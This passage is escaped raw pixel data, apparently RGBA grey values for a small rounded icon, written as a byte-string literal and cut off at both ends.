00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x0c\\x0c\\x0c\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xd2\\xd2\\xd2\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe1\\xe1\\xe1\\xff{{{\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xff***\\xff+++\\xff+++\\xff\\xaf\\xaf\\xaf\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x1e\\x1e\\x1e\\xff\\x93\\x93\\x93\\xff\\xc6\\xc6\\xc6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffaaa\\xff\\xdc\\xdc\\xdc\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\\\\\\\\\\\\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\xbb\\xbb\\xbb\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\xd7\\xd7\\xd7\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x1c\\x1c\\x1c\\xff\\xda\\xda\\xda\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x91\\x91\\x91\\xff\\x0f\\x0f\\x0f\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x87\\x87\\x87\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x98\\x98\\x98\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xba\\xba\\xba\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x19\\x19\\x19\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x08\\x08\\x08\\xff\\xe2\\xe2\\xe2\\xff\\xe6\\xe6\\xe6\\xff\\xcc\\xcc\\xcc\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x08\\x08\\x08\\xff\\xe2\\xe2\\xe2\\xff\\xe6\\xe6\\xe6\\xff\\xcc\\xcc\\xcc\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xba\\xba\\xba\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x19\\x19\\x19\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x85\\x85\\x85\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x98\\x98\\x98\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x19\\x19\\x19\\xff\\xd9\\xd9\\xd9\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x91\\x91\\x91\\xff\\x0f\\x0f\\x0f\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffZZZ\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\xbc\\xbc\\xbc\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\xd7\\xd7\\xd7\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffaaa\\xff\\xdc\\xdc\\xdc\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x1e\\x1e\\x1e\\xff\\x93\\x93\\x93\\xff\\xc6\\xc6\\xc6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xff***\\xff+++\\xff+++\\xff\\xaf\\xaf\\xaf\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xd2\\xd2\\xd2\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe1\\xe1\\xe1\\xff{{{\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x0c\\x0c\\x0c\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xf1\\xa9\